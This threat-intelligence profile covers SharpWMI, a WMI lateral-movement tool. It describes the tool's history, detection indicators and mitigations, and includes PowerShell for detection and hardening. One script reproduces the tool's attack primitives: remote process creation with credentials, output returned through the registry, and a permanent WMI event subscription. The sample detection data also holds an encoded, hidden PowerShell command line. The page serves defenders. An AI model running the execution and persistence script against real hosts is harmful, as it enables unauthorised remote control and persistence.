SharpWMI
⚠️ Overview
SharpWMI is a post-exploitation lateral movement tool written in C# that uses Windows Management Instrumentation (WMI) for remote queries, remote command execution, and script execution through WMI event subscriptions. It is not a malware family: it is an open-source offensive-security utility written by Will Schroeder (harmj0y), published on GitHub in 2017 and later maintained under the GhostPack project, that has been adopted by threat actors such as FIN12, Wizard Spider, and the operators of Conti and Ryuk ransomware alongside their own tooling. MITRE ATT&CK maps its techniques to T1047 (Windows Management Instrumentation), T1021.003 (Remote Services: Distributed Component Object Model), which is the transport remote WMI rides on, and T1546.003 (Event Triggered Execution: WMI Event Subscription).
🔧 Technical Capabilities
SharpWMI runs commands on remote systems by calling the Create method of the Win32_Process class over WMI, which travels over DCOM (TCP/135 to the RPC endpoint mapper, then a dynamic port). An attacker holding administrative credentials for the target gets process execution without RDP, without an SMB file copy, and without installing a service, which is the difference from PsExec-style tools. The tool is a plain WMI client: the SharpWMI binary on the attacker-controlled host talks to the target's Winmgmt service through the .NET System.Management API, and on the target the new process is spawned by the WMI provider host, WmiPrvSE.exe. Alternate credentials can be supplied for every remote action. Win32_Process.Create returns only a status code and a process ID, so output has to be collected through a side channel; the tool's command-with-output and file-upload actions keep that channel inside WMI, staging data on the target in temporary files or registry values that are read and written through WMI classes such as StdRegProv, with uploaded file content chunked and base64-encoded. SharpWMI can also run arbitrary VBScript on the target by registering a WMI event filter, an ActiveScriptEventConsumer, and a binding between them; the same filter, consumer and binding triple, left in place, is the persistence technique catalogued as T1546.003. The tool does not tamper with logs and WMI has no logging suppression to exploit; its evasion value is only that ordinary process creation writes nothing to the target's disk and that the traffic looks like routine administration. Modern EDR products flag WmiPrvSE.exe spawning shells and the creation of permanent event subscriptions.
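The WMI primitives the paragraph above describes, driven from PowerShell's CIM cmdlets instead of SharpWMI's C# code. This is an added example and not SharpWMI's own code; the target name, the scratch registry key and the filter/consumer names are placeholders, and the local host is assumed as the target when none is given (run it from an elevated session in that case).

```powershell
# Added example, not SharpWMI's own code: the WMI primitives the tool wraps,
# driven from PowerShell. $Target, the scratch registry key and the
# filter/consumer names are placeholders.
param(
    [string]       $Target     = $env:COMPUTERNAME,   # assumed: local host (run elevated)
    [PSCredential] $Credential = $null                # optional alternate credentials
)

# DCOM session: the transport SharpWMI's System.Management calls use
# (TCP/135 to the endpoint mapper, then a dynamic RPC port on the target).
$sessArgs = @{ ComputerName = $Target; SessionOption = (New-CimSessionOption -Protocol Dcom) }
if ($Credential) { $sessArgs.Credential = $Credential }
$s = New-CimSession @sessArgs

function Invoke-WmiCreate {
    # ATT&CK T1047: Win32_Process.Create. On the target the child process is
    # spawned by WmiPrvSE.exe, which is what detection keys on.
    param([string]$CommandLine)
    $r = Invoke-CimMethod -CimSession $s -ClassName Win32_Process -MethodName Create `
             -Arguments @{ CommandLine = $CommandLine }
    # documented Win32_Process.Create return codes
    $codes = @{ 0 = 'success'; 2 = 'access denied'; 3 = 'insufficient privilege'
                8 = 'unknown failure'; 9 = 'path not found'; 21 = 'invalid parameter' }
    [pscustomobject]@{ ReturnValue = $r.ReturnValue
                       Meaning     = $codes[[int]$r.ReturnValue]
                       ProcessId   = $r.ProcessId }
}

# Create returns only a status and a PID, so output needs a side channel that
# still stays inside WMI: the command writes it into a registry value and we
# read it back through StdRegProv (HKLM = 0x80000002). No SMB is involved.
$key  = 'SOFTWARE\WmiExampleOut'                       # assumed scratch key
$HKLM = [uint32]2147483650
$cmd  = 'powershell.exe -NoProfile -Command "New-Item -Path HKLM:\' + $key + ' -Force | Out-Null; ' +
        'Set-ItemProperty -Path HKLM:\' + $key + ' -Name out -Value (whoami /all | Out-String)"'
$res = Invoke-WmiCreate $cmd
$res

if ($res.ReturnValue -eq 0) {
    # wait for the child to exit, then fetch the value and remove the key
    while (Get-CimInstance -CimSession $s -ClassName Win32_Process -Filter "ProcessId = $($res.ProcessId)") {
        Start-Sleep -Milliseconds 500
    }
    $out = Invoke-CimMethod -CimSession $s -ClassName StdRegProv -MethodName GetStringValue `
               -Arguments @{ hDefKey = $HKLM; sSubKeyName = $key; sValueName = 'out' }
    $out.sValue
    Invoke-CimMethod -CimSession $s -ClassName StdRegProv -MethodName DeleteKey `
        -Arguments @{ hDefKey = $HKLM; sSubKeyName = $key } | Out-Null
}

# ATT&CK T1546.003: permanent event subscription. SharpWMI's VBScript execution
# and WMI persistence both rest on this filter -> consumer -> binding triple.
$ns = 'root\subscription'
$filter = New-CimInstance -CimSession $s -Namespace $ns -ClassName __EventFilter -Property @{
    Name = 'ExampleFilter'; EventNamespace = 'root\cimv2'; QueryLanguage = 'WQL'
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 30 " +
            "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 300"
}
$consumer = New-CimInstance -CimSession $s -Namespace $ns -ClassName CommandLineEventConsumer -Property @{
    Name = 'ExampleConsumer'
    CommandLineTemplate = 'cmd.exe /c echo fired > C:\Windows\Temp\wmi_example.txt'
}
$binding = New-CimInstance -CimSession $s -Namespace $ns -ClassName __FilterToConsumerBinding -Property @{
    Filter = [ref]$filter; Consumer = [ref]$consumer
}
Get-CimInstance -CimSession $s -Namespace $ns -ClassName __FilterToConsumerBinding |
    Select-Object @{n='Filter';e={$_.Filter.Name}}, @{n='Consumer';e={$_.Consumer.Name}}

# Tear it down again; this is also the incident-response cleanup step.
$binding  | Remove-CimInstance
$consumer | Remove-CimInstance
$filter   | Remove-CimInstance
Remove-CimSession $s
```

The `-Protocol Dcom` option matters for a faithful reproduction: the CIM cmdlets default to WS-Management, which uses TCP/5985 and leaves a different network footprint from the DCOM path SharpWMI takes.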
📜 History & Notable Incidents
SharpWMI was released as open source in 2017 and has been available on GitHub since, so its appearance in intrusions reflects adoption by attackers rather than development by them. FireEye and CrowdStrike reporting from 2019 tied it to Ryuk ransomware affiliates moving laterally inside healthcare and education networks, and it has been listed among the lateral movement tooling of the 2020–2021 Conti operation, including the May 2021 attack on the Irish Health Service Executive (HSE). No CVE applies to SharpWMI itself, since it abuses legitimate WMI functionality with valid administrative credentials; it has been observed alongside CVE-2020-1472 (Zerologon) in intrusions where Zerologon supplied the domain privileges that remote WMI then used. Because the tool is public source code, no law-enforcement action has targeted it or could remove it from circulation, and takedowns of ransomware infrastructure do not affect its availability.
🔍 Detection Indicators
On the target, the primary host indicator is the WMI provider host, WmiPrvSE.exe, spawning a shell or interpreter (cmd.exe, powershell.exe, wscript.exe, cscript.exe) on a machine where nobody is expected to be running remote WMI; for the VBScript path the parent is scrcons.exe, the ActiveScriptEventConsumer host. Command lines carrying base64-encoded PowerShell are a common payload shape. Process creation is visible in Sysmon Event ID 1, or in Security Event ID 4688 when command-line auditing is enabled; the Microsoft-Windows-WMI-Activity/Operational log records new permanent consumer bindings as Event ID 5861, and Sysmon Event IDs 19, 20 and 21 cover filter, consumer and binding creation. On the network, remote WMI shows up as RPC to TCP/135 followed by a DCOM connection to a dynamic port in the 49152–65535 range, from a host that does not normally manage the target. Permanent subscriptions are stored in the WMI repository under %SystemRoot%\System32\wbem\Repository and exposed through the root\subscription namespace, not in the registry; anything there beyond the default SCM Event Log filter/consumer pair deserves review. Fixed mutex names or file hashes are not reliable indicators for SharpWMI: it is compiled from public source, is routinely rebuilt or obfuscated, and the activity that matters happens on the target, where the SharpWMI binary itself never lands.
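The detection logic from the paragraph above, run over a handful of constructed sample events shaped like Sysmon Event ID 1 and WMI-Activity Event ID 5861, followed by a live sweep of the root\subscription namespace on the local host. This is an added example and not the page's or the tool's own code; the sample events are constructed, not real telemetry, and the field names follow those two log sources.

```powershell
# Added example, not from the original page. Part 1 runs detection logic over
# constructed sample events (not real telemetry) shaped like Sysmon Event ID 1
# and WMI-Activity/Operational Event ID 5861. Part 2 sweeps the live
# root\subscription namespace on the local host.

$wmiHosts = 'WmiPrvSE.exe', 'scrcons.exe'      # provider host, ActiveScript consumer host
$shells   = 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'rundll32.exe'

function Find-WmiExecution {
    param([object[]]$Events)
    foreach ($e in $Events) {
        if ($e.Id -eq 1) {
            $parent = Split-Path -Leaf $e.ParentImage
            $child  = Split-Path -Leaf $e.Image
            if ($wmiHosts -contains $parent -and $shells -contains $child) {
                [pscustomobject]@{ Rule = 'wmi_host_spawned_shell'; User = $e.User
                                   Detail = "$parent -> $child : $($e.CommandLine)" }
            }
            # -enc / -EncodedCommand followed by a base64 blob is a frequent payload shape
            if ($e.CommandLine -match '(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}') {
                [pscustomobject]@{ Rule = 'encoded_powershell'; User = $e.User; Detail = $e.CommandLine }
            }
        }
        elseif ($e.Id -eq 5861) {
            # 5861 fires when a permanent consumer is bound; the default
            # "SCM Event Log" pair is the only expected one on a stock host
            if ($e.Message -notmatch 'SCM Event Log') {
                [pscustomobject]@{ Rule = 'new_permanent_wmi_subscription'; User = $null; Detail = $e.Message }
            }
        }
    }
}

# Constructed sample events
$sample = @(
    [pscustomobject]@{ Id = 1; User = 'CORP\svc_backup'
        Image = 'C:\Windows\System32\cmd.exe'
        ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'
        CommandLine = 'cmd.exe /c whoami /all > C:\Windows\Temp\o.txt' }
    [pscustomobject]@{ Id = 1; User = 'NT AUTHORITY\SYSTEM'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\System32\wbem\scrcons.exe'
        CommandLine = 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' }
    [pscustomobject]@{ Id = 1; User = 'NT AUTHORITY\SYSTEM'          # benign: ordinary service start
        Image = 'C:\Windows\System32\svchost.exe'
        ParentImage = 'C:\Windows\System32\services.exe'
        CommandLine = 'C:\Windows\System32\svchost.exe -k netsvcs -p' }
    [pscustomobject]@{ Id = 5861
        Message = 'Namespace = //./root/subscription; Eventfilter = ExampleFilter (refer to its activate eventid:5859); ' +
                  'Consumer = CommandLineEventConsumer="ExampleConsumer"; PossibleCause = Binding EventFilter: ...' }
)
Find-WmiExecution $sample | Format-Table Rule, User, Detail -AutoSize

# Part 2: live sweep of permanent subscriptions on this host.
function Get-WmiSubscription {
    $ns = 'root\subscription'
    $consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer   # all consumer subclasses
    foreach ($b in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding) {
        $f = Get-CimInstance -Namespace $ns -ClassName __EventFilter -Filter "Name = '$($b.Filter.Name)'"
        $c = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name }
        [pscustomobject]@{
            Filter   = $b.Filter.Name
            Query    = $f.Query
            Consumer = $c.CimClass.CimClassName
            Payload  = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        }
    }
}
Get-WmiSubscription | Format-List
```

Two of the constructed Event ID 1 records fire the parent/child rule, the scrcons.exe one also trips the encoded-PowerShell rule, the svchost.exe record stays quiet, and the 5861 record is reported because its filter is not the stock SCM Event Log pair. In the live sweep, a CommandLineEventConsumer or ActiveScriptEventConsumer with a Payload is the thing to investigate.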
☠️ Risk & Impact
SharpWMI lets an attacker who already holds administrative credentials move laterally without copying a binary to the target, so file-based antivirus on the target has nothing to scan; the processes it launches are then used to deploy ransomware, stage data for exfiltration, and harvest further credentials. It has been one of several lateral movement utilities in intrusions that produced extortion demands above $10 million, notably the 2021 HSE attack, whose recovery and lost services Ireland has estimated at up to €600 million; those costs belong to the ransomware operations, not to the tool. Healthcare, education, and local government are heavily affected because remote WMI is enabled by default on Windows, their networks are often flat, and shared local administrator passwords let a single set of credentials reach many hosts.
🛡️ Mitigation
Restrict who can reach remote WMI: scope the inbound Windows Firewall rules in the "Windows Management Instrumentation (WMI)" group, and the DCOM endpoint mapper on TCP/135, to management subnets or dedicated admin hosts instead of leaving them open to every workstation. Enable the Microsoft Defender Attack Surface Reduction rules "Block process creations originating from PSExec and WMI commands" and "Block persistence through WMI event subscription" (the Office-related ASR rules do not cover this path), testing in audit mode first because the PSExec/WMI rule breaks Configuration Manager (SCCM) client management. Alert in the EDR on WmiPrvSE.exe or scrcons.exe spawning cmd.exe, PowerShell or script hosts, and on new entries in root\subscription. Since SharpWMI needs local administrator rights on the target, trimming local administrator group membership and giving each host a unique local administrator password removes most of its reach. Application control (AppLocker or Windows Defender Application Control) blocking unsigned executables in user-writable directories, as MITRE ATT&CK's Execution Prevention mitigation (M1038) recommends, stops the SharpWMI binary from running on the attacker's foothold host, though not a renamed or in-memory copy.
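The mitigations above as concrete configuration with a readback of the resulting state. This is an added example and not the page's own material; the ASR GUIDs are Microsoft's documented rule identifiers, while the management subnet 10.0.50.0/24 is a placeholder to be replaced with the real one. Run it from an elevated session.

```powershell
# Added example, not from the original page: the mitigations above as concrete
# configuration plus a readback of the resulting state. Run elevated.
# The ASR GUIDs are Microsoft's documented rule IDs; 10.0.50.0/24 is a placeholder.

# 1. Defender ASR rules that actually cover this technique (the Office rules do not).
$asr = [ordered]@{
    'd1e49aac-8f56-4280-b9ba-993a6d77406c' = 'Block process creations originating from PSExec and WMI commands'
    'e6db77e5-3df2-4cf1-b95a-636979351e5b' = 'Block persistence through WMI event subscription'
}
# Audit first: the PSExec/WMI rule breaks Configuration Manager (SCCM) client management.
$mode = 'AuditMode'   # switch to 'Enabled' once the audit events show no legitimate hits
foreach ($id in $asr.Keys) {
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $mode
}

# 2. Scope inbound WMI to the management subnet. The WMI-In rules are
#    program/service based (winmgmt inside svchost.exe), so the restriction
#    also covers the dynamic DCOM port, not just TCP/135.
$mgmt  = '10.0.50.0/24'   # placeholder
$group = 'Windows Management Instrumentation (WMI)'
Get-NetFirewallRule -DisplayGroup $group -Direction Inbound |
    Set-NetFirewallRule -Enabled True -RemoteAddress $mgmt

# 3. Read the state back so the change can be verified and checked for drift.
function Get-WmiHardeningState {
    $p = Get-MpPreference
    $rules = for ($i = 0; $i -lt $p.AttackSurfaceReductionRules_Ids.Count; $i++) {
        $id = $p.AttackSurfaceReductionRules_Ids[$i]
        if ($asr.Contains($id)) {
            # Action: 0 = Off, 1 = Block, 2 = Audit, 6 = Warn
            [pscustomobject]@{ Rule = $asr[$id]; Action = $p.AttackSurfaceReductionRules_Actions[$i] }
        }
    }
    $fw = Get-NetFirewallRule -DisplayGroup $group -Direction Inbound | ForEach-Object {
        $addr = ($_ | Get-NetFirewallAddressFilter).RemoteAddress -join ','
        [pscustomobject]@{ Rule = $_.DisplayName; Enabled = $_.Enabled; RemoteAddress = $addr }
    }
    [pscustomobject]@{ AsrRules = $rules; FirewallRules = $fw }
}
$state = Get-WmiHardeningState
$state.AsrRules      | Format-Table -AutoSize
$state.FirewallRules | Format-Table -AutoSize
```

Leave the rules in audit mode long enough to catch scheduled administration (patching, inventory, backup agents) that legitimately creates processes through WMI; those are the hits that decide whether the block mode is viable on a given host class.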
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.